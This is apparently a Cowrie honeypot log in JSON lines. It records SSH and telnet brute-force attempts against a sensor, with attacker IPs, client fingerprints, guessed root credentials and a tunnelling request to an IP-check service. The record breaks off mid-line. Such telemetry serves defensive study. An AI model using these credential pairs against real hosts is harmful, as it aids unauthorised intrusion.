{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T07:51:51.035381Z","src_ip":"212.227.235.229","session":"63ab727a759d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T07:51:51.432003Z","src_ip":"212.227.235.229","session":"63ab727a759d"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:51:52.531068Z","src_ip":"212.227.235.229","session":"63ab727a759d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":64992,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b6d41a4b5bf","protocol":"ssh","message":"New connection: 212.227.235.229:64992 (1.2.3.4:22) [session: 7b6d41a4b5bf]","sensor":"my-vps","timestamp":"2025-08-26T07:51:52.635556Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:51:52.636579Z","src_ip":"212.227.235.229","session":"7b6d41a4b5bf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T07:51:52.730234Z","src_ip":"212.227.235.229","session":"7b6d41a4b5bf"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:51:53.153912Z","src_ip":"212.227.235.229","session":"7b6d41a4b5bf"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:51:53.253474Z","src_ip":"212.227.235.229","session":"7b6d41a4b5bf"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:51:53.258087Z","src_ip":"212.227.235.229","session":"7ab833398aa4"}
{"eventid":"cowrie.session.closed","duration":46.17888641357422,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:51:58.336244Z","src_ip":"123.31.39.100","session":"87e0ac358226"}
{"eventid":"cowrie.session.closed","duration":46.0856990814209,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:51:59.398606Z","src_ip":"212.227.235.229","session":"2c94f49da70b"}
{"eventid":"cowrie.session.closed","duration":46.08386301994324,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:52:00.429520Z","src_ip":"212.227.235.229","session":"306ca3fb5b72"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":6103,"dst_ip":"1.2.3.4","dst_port":22,"session":"8fdac8317d0d","protocol":"ssh","message":"New connection: 212.227.235.229:6103 (1.2.3.4:22) [session: 8fdac8317d0d]","sensor":"my-vps","timestamp":"2025-08-26T07:53:14.370586Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-08-26T07:53:14.479591Z","src_ip":"212.227.235.229","session":"8fdac8317d0d"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-26T07:53:14.570195Z","src_ip":"212.227.235.229","session":"8fdac8317d0d"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-26T07:53:15.895272Z","src_ip":"212.227.235.229","session":"8fdac8317d0d"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:53:15.897250Z","src_ip":"212.227.235.229","session":"8fdac8317d0d"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51668,"dst_ip":"1.2.3.4","dst_port":22,"session":"2abe3d328a2b","protocol":"ssh","message":"New connection: 217.72.205.35:51668 (1.2.3.4:22) [session: 2abe3d328a2b]","sensor":"my-vps","timestamp":"2025-08-26T07:53:27.412135Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:53:27.413189Z","src_ip":"217.72.205.35","session":"2abe3d328a2b"}
{"eventid":"cowrie.session.closed","duration":120.00845289230347,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:53:38.351090Z","src_ip":"212.227.235.229","session":"1e2d53c76bd7"}
{"eventid":"cowrie.session.connect","src_ip":"211.104.255.112","src_port":58590,"dst_ip":"1.2.3.4","dst_port":23,"session":"f32ba091f8bf","protocol":"telnet","message":"New connection: 211.104.255.112:58590 (1.2.3.4:23) [session: f32ba091f8bf]","sensor":"my-vps","timestamp":"2025-08-26T07:54:18.278110Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38941,"dst_ip":"1.2.3.4","dst_port":22,"session":"70d4b4f62a33","protocol":"ssh","message":"New connection: 212.227.125.160:38941 (1.2.3.4:22) [session: 70d4b4f62a33]","sensor":"my-vps","timestamp":"2025-08-26T07:54:37.160079Z"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:54:39.160566Z","src_ip":"212.227.125.160","session":"70d4b4f62a33"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46829,"dst_ip":"1.2.3.4","dst_port":22,"session":"281bf50e119a","protocol":"ssh","message":"New connection: 212.227.125.160:46829 (1.2.3.4:22) [session: 281bf50e119a]","sensor":"my-vps","timestamp":"2025-08-26T07:54:39.195828Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T07:54:39.196606Z","src_ip":"212.227.125.160","session":"281bf50e119a"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-26T07:54:39.231479Z","src_ip":"212.227.125.160","session":"281bf50e119a"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:54:39.274246Z","src_ip":"212.227.125.160","session":"281bf50e119a"}
{"eventid":"cowrie.session.connect","src_ip":"156.244.13.176","src_port":53278,"dst_ip":"1.2.3.4","dst_port":23,"session":"b0c8447032b0","protocol":"telnet","message":"New connection: 156.244.13.176:53278 (1.2.3.4:23) [session: b0c8447032b0]","sensor":"my-vps","timestamp":"2025-08-26T07:54:44.663536Z"}
{"eventid":"cowrie.session.closed","duration":1.7995193004608154,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:54:46.462978Z","src_ip":"156.244.13.176","session":"b0c8447032b0"}
{"eventid":"cowrie.session.connect","src_ip":"156.244.13.176","src_port":53292,"dst_ip":"1.2.3.4","dst_port":23,"session":"4f98b623997c","protocol":"telnet","message":"New connection: 156.244.13.176:53292 (1.2.3.4:23) [session: 4f98b623997c]","sensor":"my-vps","timestamp":"2025-08-26T07:54:46.617694Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:54:48.643546Z","src_ip":"156.244.13.176","session":"4f98b623997c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T07:54:48.691664Z","src_ip":"156.244.13.176","session":"4f98b623997c"}
{"eventid":"cowrie.session.closed","duration":30.478718757629395,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:54:48.756739Z","src_ip":"211.104.255.112","session":"f32ba091f8bf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"1.9","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:54:50.586839Z","src_ip":"156.244.13.176","session":"4f98b623997c"}
{"eventid":"cowrie.session.closed","duration":3.9745664596557617,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:54:50.592163Z","src_ip":"156.244.13.176","session":"4f98b623997c"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":44600,"dst_ip":"1.2.3.4","dst_port":22,"session":"06b969be42c9","protocol":"ssh","message":"New connection: 45.88.8.186:44600 (1.2.3.4:22) [session: 06b969be42c9]","sensor":"my-vps","timestamp":"2025-08-26T07:55:11.879370Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T07:55:12.764778Z","src_ip":"45.88.8.186","session":"06b969be42c9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T07:55:12.765907Z","src_ip":"45.88.8.186","session":"06b969be42c9"}
{"eventid":"cowrie.login.success","username":"root","password":"Password01","message":"login attempt [root/Password01] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:55:15.366993Z","src_ip":"45.88.8.186","session":"06b969be42c9"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:55:15.955809Z","src_ip":"45.88.8.186","session":"06b969be42c9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36246,"dst_ip":"1.2.3.4","dst_port":23,"session":"53bf3f0475a8","protocol":"telnet","message":"New connection: 212.227.235.229:36246 (1.2.3.4:23) [session: 53bf3f0475a8]","sensor":"my-vps","timestamp":"2025-08-26T07:56:45.628015Z"}
{"eventid":"cowrie.session.connect","src_ip":"194.0.234.21","src_port":51346,"dst_ip":"1.2.3.4","dst_port":22,"session":"9667984acfdc","protocol":"ssh","message":"New connection: 194.0.234.21:51346 (1.2.3.4:22) [session: 9667984acfdc]","sensor":"my-vps","timestamp":"2025-08-26T07:56:45.699185Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","message":"Remote SSH version: SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","sensor":"my-vps","timestamp":"2025-08-26T07:56:45.703291Z","src_ip":"194.0.234.21","session":"9667984acfdc"}
{"eventid":"cowrie.client.kex","hassh":"390ffe68a68c2a2891210413e80689fa","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ecdsa-sha2-nistp256@openssh.com","ssh-ed25519","sk-ssh-ed25519@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: 390ffe68a68c2a2891210413e80689fa","sensor":"my-vps","timestamp":"2025-08-26T07:56:45.957350Z","src_ip":"194.0.234.21","session":"9667984acfdc"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123123","message":"login attempt [root/Aa123123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:56:46.495587Z","src_ip":"194.0.234.21","session":"9667984acfdc"}
{"eventid":"cowrie.session.closed","duration":1.544631004333496,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:56:47.172575Z","src_ip":"212.227.235.229","session":"53bf3f0475a8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36262,"dst_ip":"1.2.3.4","dst_port":23,"session":"94f659055d32","protocol":"telnet","message":"New connection: 212.227.235.229:36262 (1.2.3.4:23) [session: 94f659055d32]","sensor":"my-vps","timestamp":"2025-08-26T07:56:47.476250Z"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"108.129.19.169","dst_port":443,"src_ip":"194.0.234.21","src_port":49072,"message":"direct-tcp connection request to 108.129.19.169:443 from 127.0.0.1:49072","sensor":"my-vps","timestamp":"2025-08-26T07:56:47.666542Z","session":"9667984acfdc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"108.129.19.169","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xcdP\\x16Mzs|\\xa9\\x11O\\x13?\\xcb\\xa1\\x98n\\xae\\xdb\\xc2\\xdefA\\x07{\\x016\\xe4\\x99\\xfcnS\\xb4 H\\x19\\x0er\\x99\\x7f\\xb1$y\\x14zu\\xb2\\x9c\\xef\\x1a\\x99\\xe6\\xdcpb\\x0f\\x15 i\\x9d\\xd4\\x933\\xb1\\x99\\xed\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 2\\xd7\\xa8\\x8d\\xd9\\xe1\\xcd]'\\xe7\\xe7\\xe5\\xfa\\x06\\xe1z1P\\x86\\xd8\\xab\\xd8!\\xc7O\\xe8\\xb2\\xa2\\x92nO)\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":0,"message":"discarded direct-tcp forward request 0 to 108.129.19.169:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xcdP\\x16Mzs|\\xa9\\x11O\\x13?\\xcb\\xa1\\x98n\\xae\\xdb\\xc2\\xdefA\\x07{\\x016\\xe4\\x99\\xfcnS\\xb4 H\\x19\\x0er\\x99\\x7f\\xb1$y\\x14zu\\xb2\\x9c\\xef\\x1a\\x99\\xe6\\xdcpb\\x0f\\x15 